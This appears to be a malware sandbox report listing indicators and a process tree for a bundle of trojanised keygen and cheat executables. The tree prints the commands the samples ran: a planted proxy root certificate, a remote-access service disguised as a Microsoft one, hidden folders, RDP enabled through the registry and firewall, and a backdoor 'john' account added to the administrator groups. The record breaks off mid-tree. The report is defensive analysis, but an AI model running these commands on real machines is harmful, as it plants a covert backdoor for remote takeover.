    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDDjg2_2qua.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec1314010461140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd19000000010000001000000018e847daffeaedafa0faaea36340ea792000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576intro.exe
  • NTFS ADS
    update.exeutorrent.exetaskhost.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Users\Admin\Desktop\WinMgmts:\update.exe
    File opened for modificationC:\Users\Admin\Desktop\WinMgmts:\utorrent.exe
    File opened for modificationC:\ProgramData\Microsoft\Intel\winmgmts:\localhost\taskhost.exe
  • Runs .reg file with regedit
    regedit.exeregedit.exe

    Reported IOCs

    pidprocess
    1648regedit.exe
    1568regedit.exe
  • Runs net.exe
  • Runs ping.exe
    PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

    TTPs

    Remote System Discovery

    Reported IOCs

    pidprocess
    3008PING.EXE
    2128PING.EXE
    2296PING.EXE
    2672PING.EXE
    3816PING.EXE
    2164PING.EXE
    3668PING.EXE
    5064PING.EXE
    4320PING.EXE
    2548PING.EXE
    4052PING.EXE
  • Suspicious behavior: AddClipboardFormatListener
    api.exe

    Reported IOCs

    pidprocess
    2308api.exe
  • Suspicious behavior: CmdExeWriteProcessMemorySpam
    2.exe3.exe4.exe5.exe6.exe7.exe8.exe9.exe10.exe11.exe12.exe13.exe14.exe15.exe16.exe17.exe18.exe19.exe20.exe21.exe22.exe23.exe24.exe25.exe26.exe27.exe28.exe29.exe30.exe31.exe

    Reported IOCs

    pidprocess
    10762.exe
    26323.exe
    27444.exe
    25885.exe
    17766.exe
    19007.exe
    23528.exe
    21809.exe
    207610.exe
    184411.exe
    212412.exe
    160413.exe
    264814.exe
    194415.exe
    81616.exe
    201217.exe
    306818.exe
    300819.exe
    313620.exe
    338421.exe
    355222.exe
    374423.exe
    383224.exe
    386825.exe
    395626.exe
    401627.exe
    408428.exe
    254829.exe
    94830.exe
    332431.exe
  • Suspicious behavior: EnumeratesProcesses
    update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exeLtHv0O2KZDK4M637.exekey.exe2.exe2.exe

    Reported IOCs

    pidprocess
    1748update.exe
    1748update.exe
    1748update.exe
    1748update.exe
    1748update.exe
    1516rutserv.exe
    1516rutserv.exe
    1516rutserv.exe
    1516rutserv.exe
    1600rutserv.exe
    1600rutserv.exe
    2180rutserv.exe
    2180rutserv.exe
    2280rutserv.exe
    2280rutserv.exe
    2280rutserv.exe
    2280rutserv.exe
    2280rutserv.exe
    2280rutserv.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1632winit.exe
    1732LtHv0O2KZDK4M637.exe
    1732LtHv0O2KZDK4M637.exe
    1732LtHv0O2KZDK4M637.exe
    1732LtHv0O2KZDK4M637.exe
    1732LtHv0O2KZDK4M637.exe
    1236key.exe
    1236key.exe
    10762.exe
    21482.exe
    21482.exe
  • Suspicious behavior: GetForegroundWindowSpam
    5.exeExplorer.EXEtaskhostw.exeapi.exeWerFault.exeWerFault.exemsiexec.exevbc.exemsiexec.exekeygen-step-4.exetaskhost.exe

    Reported IOCs

    pidprocess
    25885.exe
    1268Explorer.EXE
    4072taskhostw.exe
    2308api.exe
    1720WerFault.exe
    4828WerFault.exe
    3188msiexec.exe
    4800vbc.exe
    2852msiexec.exe
    2804keygen-step-4.exe
    3516taskhost.exe
  • Suspicious behavior: LoadsDriver
    svchost.exe

    Reported IOCs

    pidprocess
    468
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
    3608svchost.exe
  • Suspicious behavior: MapViewOfSection
    2.exe2.execmmon32.exe18.exemstsc.exe3.exe13.exeIconCachenb6h.exeIconCachenb6h.exeStyltendeschris.exe19.exe11.exehmwmcj.exeIconCachenb6h.exeIconCachenb6h.execmmon32.exehelpqrqlwhj.exeIconCachenb6h.exeIconCachenb6h.exe23.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exe

    Reported IOCs

    pidprocess
    10762.exe
    21482.exe
    21482.exe
    21482.exe
    2428cmmon32.exe
    2428cmmon32.exe
    306818.exe
    306818.exe
    306818.exe
    3636mstsc.exe
    3636mstsc.exe
    26323.exe
    160413.exe
    3844IconCachenb6h.exe
    1548IconCachenb6h.exe
    1548IconCachenb6h.exe
    1548IconCachenb6h.exe
    1908Styltendeschris.exe
    300819.exe
    282811.exe
    282811.exe
    4356hmwmcj.exe
    282811.exe
    282811.exe
    2416IconCachenb6h.exe
    4356hmwmcj.exe
    1568IconCachenb6h.exe
    4356hmwmcj.exe
    1568IconCachenb6h.exe
    1568IconCachenb6h.exe
    4356hmwmcj.exe
    4560cmmon32.exe
    4560cmmon32.exe
    4356hmwmcj.exe
    3432helpqrqlwhj.exe
    4356hmwmcj.exe
    3432helpqrqlwhj.exe
    3432helpqrqlwhj.exe
    5052IconCachenb6h.exe
    4032IconCachenb6h.exe
    4032IconCachenb6h.exe
    4032IconCachenb6h.exe
    4032IconCachenb6h.exe
    374423.exe
    4680IconCachenb6h.exe
    2412IconCachenb6h.exe
    2412IconCachenb6h.exe
    2412IconCachenb6h.exe
    2412IconCachenb6h.exe
    5020IconCachenb6h.exe
    3580IconCachenb6h.exe
    3580IconCachenb6h.exe
    3580IconCachenb6h.exe
    3580IconCachenb6h.exe
    3256IconCachenb6h.exe
    4424IconCachenb6h.exe
    2428cmmon32.exe
    4424IconCachenb6h.exe
    4424IconCachenb6h.exe
    2428cmmon32.exe
    2428cmmon32.exe
    2428cmmon32.exe
    2428cmmon32.exe
    2428cmmon32.exe
  • Suspicious behavior: RenamesItself
    16.exe

    Reported IOCs

    pidprocess
    81616.exe
  • Suspicious behavior: SetClipboardViewer
    InstallUtil.exe

    Reported IOCs

    pidprocess
    3704InstallUtil.exe
  • Suspicious use of AdjustPrivilegeToken
    rutserv.exerutserv.exerutserv.exeapi.exe2.exeExplorer.EXE5.execmmon32.exe8.exe26.exeAUDIODG.EXE18.exevssvc.exemstsc.exekey.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1516rutserv.exe
    Token: SeDebugPrivilege2180rutserv.exe
    Token: SeTakeOwnershipPrivilege2280rutserv.exe
    Token: SeTcbPrivilege2280rutserv.exe
    Token: SeTcbPrivilege2280rutserv.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeDebugPrivilege2308api.exe
    Token: SeDebugPrivilege2308api.exe
    Token: SeDebugPrivilege2308api.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeDebugPrivilege21482.exe
    Token: SeShutdownPrivilege1268Explorer.EXE
    Token: SeDebugPrivilege25885.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeDebugPrivilege2308api.exe
    Token: SeDebugPrivilege2308api.exe
    Token: SeDebugPrivilege2308api.exe
    Token: SeDebugPrivilege2428cmmon32.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeShutdownPrivilege1268Explorer.EXE
    Token: SeShutdownPrivilege1268Explorer.EXE
    Token: SeRestorePrivilege2308api.exe
    Token: SeShutdownPrivilege1268Explorer.EXE
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeRestorePrivilege2308api.exe
    Token: SeTakeOwnershipPrivilege2308api.exe
    Token: SeShutdownPrivilege1268Explorer.EXE
    Token: SeShutdownPrivilege1268Explorer.EXE
    Token: SeShutdownPrivilege1268Explorer.EXE
    Token: SeDebugPrivilege23528.exe
    Token: SeDebugPrivilege395626.exe
    Token: 332660AUDIODG.EXE
    Token: SeIncBasePriorityPrivilege2660AUDIODG.EXE
    Token: 332660AUDIODG.EXE
    Token: SeIncBasePriorityPrivilege2660AUDIODG.EXE
    Token: SeDebugPrivilege306818.exe
    Token: SeBackupPrivilege2800vssvc.exe
    Token: SeRestorePrivilege2800vssvc.exe
    Token: SeAuditPrivilege2800vssvc.exe
    Token: SeDebugPrivilege3636mstsc.exe
    Token: SeImpersonatePrivilege1236key.exe
    Token: SeTcbPrivilege1236key.exe
    Token: SeChangeNotifyPrivilege1236key.exe
    Token: SeCreateTokenPrivilege1236key.exe
    Token: SeBackupPrivilege1236key.exe
    Token: SeRestorePrivilege1236key.exe
    Token: SeIncreaseQuotaPrivilege1236key.exe
    Token: SeAssignPrimaryTokenPrivilege1236key.exe
    Token: SeImpersonatePrivilege1236key.exe
    Token: SeTcbPrivilege1236key.exe
    Token: SeChangeNotifyPrivilege1236key.exe
    Token: SeCreateTokenPrivilege1236key.exe
  • Suspicious use of FindShellTrayWindow
    Downloads.exe30.exeExplorer.EXEmsiexec.exeapi.exeupdate.exeiexplore.exeiexplore.exemsiexec.exe

    Reported IOCs

    pidprocess
    2024Downloads.exe
    94830.exe
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    1268Explorer.EXE
    1268Explorer.EXE
    3188msiexec.exe
    1268Explorer.EXE
    1268Explorer.EXE
    2308api.exe
    1268Explorer.EXE
    1268Explorer.EXE
    2308api.exe
    4948update.exe
    4948update.exe
    4948update.exe
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1208iexplore.exe
    1268Explorer.EXE
    1268Explorer.EXE
    4716iexplore.exe
    2852msiexec.exe
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1208iexplore.exe
    2308api.exe
    2308api.exe
    1208iexplore.exe
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
  • Suspicious use of SendNotifyMessage
    30.exeExplorer.EXEapi.exeupdate.exe

    Reported IOCs

    pidprocess
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    94830.exe
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    2308api.exe
    2308api.exe
    4948update.exe
    4948update.exe
    4948update.exe
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    1268Explorer.EXE
    2308api.exe
    2308api.exe
  • Suspicious use of SetWindowsHookEx
    Downloads.exerutserv.exe002.exerutserv.exerutserv.exerutserv.exe002.exeapi.exe3.exe5.exe7.exe15.exe13.exe20.exe23.exe25.exe19.exerundll32.exe28.exe31.exekeygen-step-2.exeiexplore.exe002.exeStyltendeschris.exeid6.exeIEXPLORE.EXEwyfdggaa.exeiexplore.exeIEXPLORE.EXE24.exeInstallUtil.exeIEXPLORE.EXEIEXPLORE.EXE

    Reported IOCs

    pidprocess
    2024Downloads.exe
    2024Downloads.exe
    1516rutserv.exe
    1940002.exe
    1940002.exe
    1600rutserv.exe
    2180rutserv.exe
    2280rutserv.exe
    3060002.exe
    3060002.exe
    2308api.exe
    26323.exe
    25885.exe
    19007.exe
    194415.exe
    160413.exe
    313620.exe
    374423.exe
    386825.exe
    300819.exe
    3132rundll32.exe
    408428.exe
    332431.exe
    2016keygen-step-2.exe
    1208iexplore.exe
    1208iexplore.exe
    4224002.exe
    4224002.exe
    1908Styltendeschris.exe
    1160id6.exe
    1160id6.exe
    4436IEXPLORE.EXE
    4436IEXPLORE.EXE
    3376wyfdggaa.exe
    3376wyfdggaa.exe
    3376wyfdggaa.exe
    3376wyfdggaa.exe
    4716iexplore.exe
    4716iexplore.exe
    2568IEXPLORE.EXE
    2568IEXPLORE.EXE
    155224.exe
    3704InstallUtil.exe
    1208iexplore.exe
    1208iexplore.exe
    6060IEXPLORE.EXE
    6060IEXPLORE.EXE
    1208iexplore.exe
    1208iexplore.exe
    2164IEXPLORE.EXE
    2164IEXPLORE.EXE
  • Suspicious use of WriteProcessMemory
    update.exewini.exeWScript.execmd.exeRemouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.execmd.exekeygen-pr.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1748 wrote to memory of 8761748update.exewini.exe
    PID 1748 wrote to memory of 8761748update.exewini.exe
    PID 1748 wrote to memory of 8761748update.exewini.exe
    PID 1748 wrote to memory of 8761748update.exewini.exe
    PID 876 wrote to memory of 408876wini.exeWScript.exe
    PID 876 wrote to memory of 408876wini.exeWScript.exe
    PID 876 wrote to memory of 408876wini.exeWScript.exe
    PID 876 wrote to memory of 408876wini.exeWScript.exe
    PID 876 wrote to memory of 1632876wini.exewinit.exe
    PID 876 wrote to memory of 1632876wini.exewinit.exe
    PID 876 wrote to memory of 1632876wini.exewinit.exe
    PID 876 wrote to memory of 1632876wini.exewinit.exe
    PID 408 wrote to memory of 440408WScript.execmd.exe
    PID 408 wrote to memory of 440408WScript.execmd.exe
    PID 408 wrote to memory of 440408WScript.execmd.exe
    PID 408 wrote to memory of 440408WScript.execmd.exe
    PID 408 wrote to memory of 440408WScript.execmd.exe
    PID 408 wrote to memory of 440408WScript.execmd.exe
    PID 408 wrote to memory of 440408WScript.execmd.exe
    PID 440 wrote to memory of 1648440cmd.exeregedit.exe
    PID 440 wrote to memory of 1648440cmd.exeregedit.exe
    PID 440 wrote to memory of 1648440cmd.exeregedit.exe
    PID 440 wrote to memory of 1648440cmd.exeregedit.exe
    PID 440 wrote to memory of 1568440cmd.exeregedit.exe
    PID 440 wrote to memory of 1568440cmd.exeregedit.exe
    PID 440 wrote to memory of 1568440cmd.exeregedit.exe
    PID 440 wrote to memory of 1568440cmd.exeregedit.exe
    PID 440 wrote to memory of 1016440cmd.exetimeout.exe
    PID 440 wrote to memory of 1016440cmd.exetimeout.exe
    PID 440 wrote to memory of 1016440cmd.exetimeout.exe
    PID 440 wrote to memory of 1016440cmd.exetimeout.exe
    PID 1248 wrote to memory of 2401248Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.execmd.exe
    PID 1248 wrote to memory of 2401248Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.execmd.exe
    PID 1248 wrote to memory of 2401248Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.execmd.exe
    PID 1248 wrote to memory of 2401248Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.execmd.exe
    PID 240 wrote to memory of 996240cmd.exeintro.exe
    PID 240 wrote to memory of 996240cmd.exeintro.exe
    PID 240 wrote to memory of 996240cmd.exeintro.exe
    PID 240 wrote to memory of 996240cmd.exeintro.exe
    PID 240 wrote to memory of 1320240cmd.exekeygen-pr.exe
    PID 240 wrote to memory of 1320240cmd.exekeygen-pr.exe
    PID 240 wrote to memory of 1320240cmd.exekeygen-pr.exe
    PID 240 wrote to memory of 1320240cmd.exekeygen-pr.exe
    PID 240 wrote to memory of 1320240cmd.exekeygen-pr.exe
    PID 240 wrote to memory of 1320240cmd.exekeygen-pr.exe
    PID 240 wrote to memory of 1320240cmd.exekeygen-pr.exe
    PID 240 wrote to memory of 1604240cmd.exekeygen-step-1.exe
    PID 240 wrote to memory of 1604240cmd.exekeygen-step-1.exe
    PID 240 wrote to memory of 1604240cmd.exekeygen-step-1.exe
    PID 240 wrote to memory of 1604240cmd.exekeygen-step-1.exe
    PID 1748 wrote to memory of 17641748update.execheat.exe
    PID 1748 wrote to memory of 17641748update.execheat.exe
    PID 1748 wrote to memory of 17641748update.execheat.exe
    PID 1748 wrote to memory of 17641748update.execheat.exe
    PID 240 wrote to memory of 316240cmd.exekeygen-step-4.exe
    PID 240 wrote to memory of 316240cmd.exekeygen-step-4.exe
    PID 240 wrote to memory of 316240cmd.exekeygen-step-4.exe
    PID 240 wrote to memory of 316240cmd.exekeygen-step-4.exe
    PID 440 wrote to memory of 1516440cmd.exerutserv.exe
    PID 440 wrote to memory of 1516440cmd.exerutserv.exe
    PID 440 wrote to memory of 1516440cmd.exerutserv.exe
    PID 440 wrote to memory of 1516440cmd.exerutserv.exe
    PID 1320 wrote to memory of 12361320keygen-pr.exekey.exe
    PID 1320 wrote to memory of 12361320keygen-pr.exekey.exe
  • Views/modifies file attributes
    attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

    Tags

    TTPs

    Hidden Files and Directories

    Reported IOCs

    pidprocess
    3248attrib.exe
    3640attrib.exe
    2576attrib.exe
    2892attrib.exe
    476attrib.exe
Processes 495
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    Suspicious behavior: GetForegroundWindowSpam
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    PID:1268
    • C:\Users\Admin\AppData\Local\Temp\Downloads.exe
      "C:\Users\Admin\AppData\Local\Temp\Downloads.exe"
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2024
    • C:\Users\Admin\Desktop\update.exe
      "C:\Users\Admin\Desktop\update.exe"
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      Modifies WinLogon
      NTFS ADS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1748
      • C:\ProgramData\Microsoft\Intel\wini.exe
        C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        PID:876
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
          Suspicious use of WriteProcessMemory
          PID:408
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Programdata\Windows\install.bat" "
            Loads dropped DLL
            Suspicious use of WriteProcessMemory
            PID:440
            • C:\Windows\SysWOW64\regedit.exe
              regedit /s "reg1.reg"
              Runs .reg file with regedit
              PID:1648
            • C:\Windows\SysWOW64\regedit.exe
              regedit /s "reg2.reg"
              Runs .reg file with regedit
              PID:1568
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              Delays execution with timeout.exe
              PID:1016
            • C:\ProgramData\Windows\rutserv.exe
              rutserv.exe /silentinstall
              Executes dropped EXE
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              Suspicious use of SetWindowsHookEx
              PID:1516
            • C:\ProgramData\Windows\rutserv.exe
              rutserv.exe /firewall
              Executes dropped EXE
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of SetWindowsHookEx
              PID:1600
            • C:\ProgramData\Windows\rutserv.exe
              rutserv.exe /start
              Executes dropped EXE
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              Suspicious use of SetWindowsHookEx
              PID:2180
            • C:\Windows\SysWOW64\attrib.exe
              ATTRIB +H +S C:\Programdata\Windows\*.*
              Views/modifies file attributes
              PID:2892
            • C:\Windows\SysWOW64\attrib.exe
              ATTRIB +H +S C:\Programdata\Windows
              Views/modifies file attributes
              PID:476
            • C:\Windows\SysWOW64\sc.exe
              sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
              PID:2352
            • C:\Windows\SysWOW64\sc.exe
              sc config RManService obj= LocalSystem type= interact type= own
              PID:2660
            • C:\Windows\SysWOW64\sc.exe
              sc config RManService DisplayName= "Microsoft Framework"
              PID:2696
        • C:\ProgramData\Windows\winit.exe
          "C:\ProgramData\Windows\winit.exe"
          Executes dropped EXE
          Checks processor information in registry
          Modifies registry class
          Modifies system certificate store
          Suspicious behavior: EnumeratesProcesses
          PID:1632
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Programdata\Install\del.bat
            PID:2052
            • C:\Windows\SysWOW64\timeout.exe
              timeout 5
              Delays execution with timeout.exe
              PID:2928
      • C:\programdata\install\cheat.exe
        C:\programdata\install\cheat.exe -pnaxui
        Executes dropped EXE
        Loads dropped DLL
        PID:1764
        • C:\ProgramData\Microsoft\Intel\taskhost.exe
          "C:\ProgramData\Microsoft\Intel\taskhost.exe"
          Executes dropped EXE
          NTFS ADS
          PID:1760
          • C:\Programdata\RealtekHD\taskhostw.exe
            C:\Programdata\RealtekHD\taskhostw.exe
            Adds Run key to start application
            Suspicious behavior: GetForegroundWindowSpam
            PID:4072
          • C:\ProgramData\Microsoft\Intel\R8.exe
            C:\ProgramData\Microsoft\Intel\R8.exe
            PID:2472
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
              PID:3712
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\rdp\pause.bat" "
                PID:4176
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im Rar.exe
                  Kills process with taskkill
                  PID:2940
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im Rar.exe
                  Kills process with taskkill
                  PID:4792
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 3
                  Delays execution with timeout.exe
                  PID:3584
                • C:\Windows\SysWOW64\chcp.com
                  chcp 1251
                  PID:4900
                • C:\rdp\Rar.exe
                  "Rar.exe" e -p555 db.rar
                  PID:3548
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im Rar.exe
                  Kills process with taskkill
                  PID:1224
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  Delays execution with timeout.exe
                  PID:2860
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                  PID:1860
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\rdp\bat.bat" "
                    PID:3696
                    • C:\Windows\SysWOW64\reg.exe
                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                      PID:2320
                    • C:\Windows\SysWOW64\reg.exe
                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                      PID:3892
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                      PID:5376
                    • C:\Windows\SysWOW64\net.exe
                      net.exe user "john" "12345" /add
                      PID:5912
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user "john" "12345" /add
                        PID:5996
                    • C:\Windows\SysWOW64\chcp.com
                      chcp 1251
                      PID:4652
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Администраторы" "John" /add
                      PID:3960
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                        PID:2368
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Administratorzy" "John" /add
                      PID:1332
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                        PID:5664
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Administrators" John /add
                      PID:5760
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Administrators" John /add
                        PID:5784
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Administradores" John /add
                      PID:4208
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Administradores" John /add
                        PID:2004
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:996
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                        PID:5416
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup "Пользователи удаленного управления" John /add
                      PID:1376
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                        PID:3048
                    • C:\Windows\SysWOW64\net.exe
